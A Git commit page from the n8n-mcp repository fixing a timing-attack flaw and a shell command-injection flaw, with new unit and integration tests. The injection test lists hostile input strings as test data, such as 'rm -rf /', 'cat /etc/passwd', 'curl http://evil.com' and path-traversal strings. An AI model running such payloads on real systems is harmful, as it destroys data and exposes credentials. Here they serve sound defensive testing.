ros/n8n-mcp
1
0
Fork 0
mirror of https://github.com/czlonkowski/n8n-mcp.git synced 2026-03-25 03:43:08 +00:00
Code Issues Packages Projects Releases Wiki Activity

security: fix CRITICAL timing attack and command injection vulnerabilities (Issue #265)

Browse Source 
This commit addresses 2 critical security vulnerabilities identified in the
security audit.

## CRITICAL-02: Timing Attack Vulnerability (CVSS 8.5)

**Problem:** Non-constant-time string comparison in authentication allowed
timing attacks to discover tokens character-by-character through statistical
timing analysis (estimated 24-48 hours to compromise).

**Fix:** Implemented crypto.timingSafeEqual for all token comparisons

**Changes:**
- Added AuthManager.timingSafeCompare() constant-time comparison utility
- Fixed src/utils/auth.ts:27 - validateToken method
- Fixed src/http-server-single-session.ts:1087 - Single-session HTTP auth
- Fixed src/http-server.ts:315 - Fixed HTTP server auth
- Added 11 unit tests with timing variance analysis (<10% variance proven)

## CRITICAL-01: Command Injection Vulnerability (CVSS 8.8)

**Problem:** User-controlled nodeType parameter injected into shell commands
via execSync, allowing remote code execution, data exfiltration, and network
scanning.

**Fix:** Eliminated all shell execution, replaced with Node.js fs APIs

**Changes:**
- Replaced execSync() with fs.readdir() in enhanced-documentation-fetcher.ts
- Added multi-layer input sanitization: /[^a-zA-Z0-9._-]/g
- Added directory traversal protection (blocks .., /, relative paths)
- Added path.basename() for additional safety
- Added final path verification (ensures result within expected directory)
- Added 9 integration tests covering all attack vectors

## Test Results

All Tests Passing:
- Unit tests: 11/11  (timing-safe comparison)
- Integration tests: 9/9  (command injection prevention)
- Timing variance: <10%  (proves constant-time)
- All existing tests:  (no regressions)

## Breaking Changes

None - All changes are backward compatible.

## References

- Security Audit: Issue #265
- Implementation Plan: docs/local/security-implementation-plan-issue-265.md
- Audit Analysis: docs/local/security-audit-analysis-issue-265.md

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude <noreply@anthropic.com>
This commit is contained in:
czlonkowski
2025-10-06 14:09:06 +02:00
parent e1be4473a3
commit b106550520
9 changed files with 625 additions and 39 deletions
Download Patch File Download Diff File Expand all files Collapse all files

166
tests/integration/security/command-injection-prevention.test.ts Normal file
View File

@@ -0,0 +1,166 @@
import { describe, it, expect, beforeAll } from 'vitest';
import { EnhancedDocumentationFetcher } from '../../../src/utils/enhanced-documentation-fetcher';
/**
* Integration tests for command injection prevention
*
* SECURITY: These tests verify that malicious inputs cannot execute shell commands
* See: https://github.com/czlonkowski/n8n-mcp/issues/265 (CRITICAL-01)
*/
describe('Command Injection Prevention', () => {
let fetcher: EnhancedDocumentationFetcher;
beforeAll(() => {
fetcher = new EnhancedDocumentationFetcher();
});
describe('Command Injection Attacks', () => {
it('should sanitize all command injection attempts without executing commands', async () => {
// SECURITY: The key is that special characters are sanitized, preventing command execution
// After sanitization, the string may become a valid search term (e.g., 'test')
// which is safe behavior - no commands are executed
const attacks = [
'test"; rm -rf / #', // Sanitizes to: test
'test && cat /etc/passwd',// Sanitizes to: test
'test | curl http://evil.com', // Sanitizes to: test
'test`whoami`', // Sanitizes to: test
'test$(cat /etc/passwd)', // Sanitizes to: test
'test\nrm -rf /', // Sanitizes to: test
'"; rm -rf / #', // Sanitizes to: empty
'&&& curl http://evil.com', // Sanitizes to: empty
'|||', // Sanitizes to: empty
'```', // Sanitizes to: empty
'$()', // Sanitizes to: empty
'\n\n\n', // Sanitizes to: empty
];
for (const attack of attacks) {
// Should complete without throwing errors or executing commands
// Result may be null or may find documentation - both are safe as long as no commands execute
await expect(fetcher.getEnhancedNodeDocumentation(attack)).resolves.toBeDefined();
}
});
});
describe('Directory Traversal Prevention', () => {
it('should block parent directory traversal', async () => {
const traversalAttacks = [
'../../../etc/passwd',
'../../etc/passwd',
'../etc/passwd',
];
for (const attack of traversalAttacks) {
const result = await fetcher.getEnhancedNodeDocumentation(attack);
expect(result).toBeNull();
}
});
it('should block URL-encoded directory traversal', async () => {
const traversalAttacks = [
'..%2f..%2fetc%2fpasswd',
'..%2fetc%2fpasswd',
];
for (const attack of traversalAttacks) {
const result = await fetcher.getEnhancedNodeDocumentation(attack);
expect(result).toBeNull();
}
});
it('should block relative path references', async () => {
const pathAttacks = [
'..',
'....',
'./test',
'../test',
];
for (const attack of pathAttacks) {
const result = await fetcher.getEnhancedNodeDocumentation(attack);
expect(result).toBeNull();
}
});
it('should block absolute paths', async () => {
const pathAttacks = [
'/etc/passwd',
'/usr/bin/whoami',
'/var/log/auth.log',
];
for (const attack of pathAttacks) {
const result = await fetcher.getEnhancedNodeDocumentation(attack);
expect(result).toBeNull();
}
});
});
describe('Special Character Handling', () => {
it('should sanitize special characters', async () => {
const specialChars = [
'test;',
'test|',
'test&',
'test`',
'test$',
'test(',
'test)',
'test<',
'test>',
];
for (const input of specialChars) {
const result = await fetcher.getEnhancedNodeDocumentation(input);
// Should sanitize and search, not execute commands
// Result should be null (not found) but no command execution
expect(result).toBeNull();
}
});
it('should sanitize null bytes', async () => {
// Null bytes are sanitized, leaving 'test' as valid search term
const nullByteAttacks = [
'test\0.md',
'test\u0000',
];
for (const attack of nullByteAttacks) {
// Should complete safely - null bytes are removed
await expect(fetcher.getEnhancedNodeDocumentation(attack)).resolves.toBeDefined();
}
});
});
describe('Legitimate Operations', () => {
it('should still find valid node documentation with safe characters', async () => {
// Test with a real node type that should exist
const validNodeTypes = [
'slack',
'gmail',
'httpRequest',
];
for (const nodeType of validNodeTypes) {
const result = await fetcher.getEnhancedNodeDocumentation(nodeType);
// May or may not find docs depending on setup, but should not throw or execute commands
// The key is that it completes without error
expect(result === null || typeof result === 'object').toBe(true);
}
});
it('should handle hyphens and underscores safely', async () => {
const safeNames = [
'http-request',
'google_sheets',
'n8n-nodes-base',
];
for (const name of safeNames) {
const result = await fetcher.getEnhancedNodeDocumentation(name);
// Should process safely without executing commands
expect(result === null || typeof result === 'object').toBe(true);
}
});
});
});

130
tests/unit/utils/auth-timing-safe.test.ts Normal file
View File

@@ -0,0 +1,130 @@
import { describe, it, expect } from 'vitest';
import { AuthManager } from '../../../src/utils/auth';
/**
* Unit tests for AuthManager.timingSafeCompare
*
* SECURITY: These tests verify constant-time comparison to prevent timing attacks
* See: https://github.com/czlonkowski/n8n-mcp/issues/265 (CRITICAL-02)
*/
describe('AuthManager.timingSafeCompare', () => {
describe('Security: Timing Attack Prevention', () => {
it('should return true for matching tokens', () => {
const token = 'a'.repeat(32);
const result = AuthManager.timingSafeCompare(token, token);
expect(result).toBe(true);
});
it('should return false for different tokens', () => {
const token1 = 'a'.repeat(32);
const token2 = 'b'.repeat(32);
const result = AuthManager.timingSafeCompare(token1, token2);
expect(result).toBe(false);
});
it('should return false for tokens of different lengths', () => {
const token1 = 'a'.repeat(32);
const token2 = 'a'.repeat(64);
const result = AuthManager.timingSafeCompare(token1, token2);
expect(result).toBe(false);
});
it('should return false for empty tokens', () => {
expect(AuthManager.timingSafeCompare('', 'test')).toBe(false);
expect(AuthManager.timingSafeCompare('test', '')).toBe(false);
expect(AuthManager.timingSafeCompare('', '')).toBe(false);
});
it('should use constant-time comparison (timing analysis)', () => {
const correctToken = 'a'.repeat(64);
const wrongFirstChar = 'b' + 'a'.repeat(63);
const wrongLastChar = 'a'.repeat(63) + 'b';
const samples = 1000;
const timings = {
wrongFirst: [] as number[],
wrongLast: [] as number[],
};
// Measure timing for wrong first character
for (let i = 0; i < samples; i++) {
const start = process.hrtime.bigint();
AuthManager.timingSafeCompare(wrongFirstChar, correctToken);
const end = process.hrtime.bigint();
timings.wrongFirst.push(Number(end - start));
}
// Measure timing for wrong last character
for (let i = 0; i < samples; i++) {
const start = process.hrtime.bigint();
AuthManager.timingSafeCompare(wrongLastChar, correctToken);
const end = process.hrtime.bigint();
timings.wrongLast.push(Number(end - start));
}
// Calculate medians
const median = (arr: number[]) => {
const sorted = arr.slice().sort((a, b) => a - b);
return sorted[Math.floor(sorted.length / 2)];
};
const medianFirst = median(timings.wrongFirst);
const medianLast = median(timings.wrongLast);
// Timing variance should be less than 10% (constant-time)
const variance = Math.abs(medianFirst - medianLast) / medianFirst;
expect(variance).toBeLessThan(0.10);
});
it('should handle special characters safely', () => {
const token1 = 'abc!@#$%^&*()_+-=[]{}|;:,.<>?';
const token2 = 'abc!@#$%^&*()_+-=[]{}|;:,.<>?';
const token3 = 'xyz!@#$%^&*()_+-=[]{}|;:,.<>?';
expect(AuthManager.timingSafeCompare(token1, token2)).toBe(true);
expect(AuthManager.timingSafeCompare(token1, token3)).toBe(false);
});
it('should handle unicode characters', () => {
const token1 = '你好世界🌍🔒';
const token2 = '你好世界🌍🔒';
const token3 = '你好世界🌍❌';
expect(AuthManager.timingSafeCompare(token1, token2)).toBe(true);
expect(AuthManager.timingSafeCompare(token1, token3)).toBe(false);
});
});
describe('Edge Cases', () => {
it('should handle null/undefined gracefully', () => {
expect(AuthManager.timingSafeCompare(null as any, 'test')).toBe(false);
expect(AuthManager.timingSafeCompare('test', null as any)).toBe(false);
expect(AuthManager.timingSafeCompare(undefined as any, 'test')).toBe(false);
expect(AuthManager.timingSafeCompare('test', undefined as any)).toBe(false);
});
it('should handle very long tokens', () => {
const longToken = 'a'.repeat(10000);
expect(AuthManager.timingSafeCompare(longToken, longToken)).toBe(true);
expect(AuthManager.timingSafeCompare(longToken, 'b'.repeat(10000))).toBe(false);
});
it('should handle whitespace correctly', () => {
const token1 = 'test-token-with-spaces';
const token2 = 'test-token-with-spaces '; // Trailing space
const token3 = ' test-token-with-spaces'; // Leading space
expect(AuthManager.timingSafeCompare(token1, token1)).toBe(true);
expect(AuthManager.timingSafeCompare(token1, token2)).toBe(false);
expect(AuthManager.timingSafeCompare(token1, token3)).toBe(false);
});
it('should be case-sensitive', () => {
const token1 = 'TestToken123';
const token2 = 'testtoken123';
expect(AuthManager.timingSafeCompare(token1, token2)).toBe(false);
});
});
});